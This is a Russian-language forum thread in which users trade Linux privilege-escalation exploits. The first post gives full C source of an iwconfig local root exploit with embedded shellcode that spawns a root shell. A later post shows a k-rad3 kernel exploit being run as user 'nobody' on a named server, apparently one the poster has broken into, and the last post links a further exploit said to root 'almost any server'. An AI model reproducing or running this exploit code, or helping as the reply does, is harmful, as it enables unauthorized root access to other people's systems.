здравствуйте вот тут есть такой сплоит /* Name: iw-config.c Copyright: !sh2k+!tc2k Author: heka Date: 11/11/2003 Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode, dunric, termid, kewlcat, JiNKS Description: /sbin/iwconfig - local root exploit iwconfig manipulate the basic wireless parameters */ #include <stdio.h> #define BIN "/sbin/iwconfig" unsigned char shellcode[] = "\x31\xc0\x31\xdb\xb0\x13\xcd\x80\x31\xc0\xb0\x2e" "\xcd\x0\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3" "\xb0\x27\xcd\x80\x30\xc0\xb0\x3d\xcd\x80\x31\xc0" "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f" "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb" "\x6a\x2e\x89\xe3\xb1\x3d\xcd\x80\x31\xc0\x31\xdb" "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd" "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80"; int main () { int x; char buf[97], out[13321], *buffer; unsigned long ret_add = 0xbffffbb8, *add_ptr ; buffer = buf; add_ptr = (long *)buffer; for (x=0; x<97-1; x+=4) *(add_ptr++)=ret_add; memset ((char *)out, 0x90, 1337); memcpy ((char *)out + 333, shellcode, strlen(shellcode)); memcpy((char *)out, "OUT=", 4); putenv(out); execl (BIN, BIN, buf, NULL); return 0; } я его скомпилил на сервере у меня получилося сейчас вопрос как с ним работать ?
Во-первых не туда отпостил, для сплойтов есть спец тема выше. Как работать - запускай получившийся бинарник =)
да и еще одно как запускать вот этот сплоит k-rad3.c кто может помогите стукните в 924607 запускаю вроде все правильо bash-2.05b$ ./k-rad3 -t 1 -p 2 ←[1;30m[ ←[1;37m k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit ←[1;30m ]←[0m ←[1;30m[ ←[1;37mDiscovered Jan 2005 by sd <[email protected]>←[1;30m ]←[0m ←[1;30m[ ←[1;37mModified 2005/9 by alert7 <[email protected]>←[1;30m ]←[0m [+] try open /proc/cpuinfo .. ok!! [+] find cpu flag pse in /proc/cpuinfo [+] CONFIG_X86_PAE :none [+] Cpu flag: pse ok [+] Exploit Way : 0 [+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n) [+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 epoll_wait: Invalid argument Linux landing.captainserver.net 2.6.8-022stab070.4-enterprise #1 SMP Mon Mar 6 5:28:36 MSK 2006 i686 athlon i386 GNU/Linux [+] idtr.base 0xffff4000 ,base 0xc0000000 [+] kwrite base 0xc0000000, buf 0xbffed7e0,num 8196 [-] This kernel not vulnerability!!! bash-2.05b$ id uid=99(nobody) gid=99(nobody) groups=99(nobody) bash-2.05b$ но что то ни чего не выходит
ультросплоент http://xpl.jino-net.ru/gcc343prior.c даёт права uid=0(root) gid=0(root) почти на любом серваке [size=-200]гавносплойт=\[/size]